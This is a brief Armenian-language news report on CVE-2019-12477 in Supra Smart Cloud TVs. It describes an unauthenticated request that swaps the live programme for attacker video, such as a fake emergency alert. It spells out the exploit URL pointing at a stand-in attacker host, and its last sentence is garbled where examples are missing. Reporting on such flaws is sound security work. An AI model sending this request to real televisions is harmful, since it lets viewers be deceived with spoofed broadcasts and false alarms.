Supra Smart Cloud հեռուստացույցների վրա խոցելիություն (CVE-2019-12477), որը թույլ է տալիս փոխարինել ներկայումս դիտված ծրագիրը հարձակվողի բովանդակությամբ: Որպես օրինակ՝ ցուցադրվում է արտակարգ իրավիճակի մասին մտացածին նախազգուշացման արդյունքը:
Հարձակման համար բավական է ուղարկել հատուկ մշակված ցանցային հարցում, որը չի պահանջում նույնականացում: Մասնավորապես, դուք կարող եք մուտք գործել «/remote/media_control?action=setUri&uri=» մշակիչ՝ նշելով m3u8 ֆայլի URL-ը վիդեո պարամետրերով, օրինակ՝ «http://192.168.1.155/remote/media_control?action=setUri&uri= http://attacker .com/fake_broadcast_message.m3u8»:
Շատ դեպքերում, հեռուստացույցի IP հասցեին հասանելիությունը սահմանափակվում է ներքին ցանցով, սակայն քանի որ հարցումն ուղարկվում է HTTP-ի միջոցով, հնարավոր է օգտագործել ներքին ռեսուրսներ մուտք գործելու մեթոդներ, երբ օգտատերը բացում է հատուկ նախագծված արտաքին էջ (օրինակ՝ տակ նկարի խնդրանքի կերպարանքը կամ օգտագործելով ).
Source: opennet.ru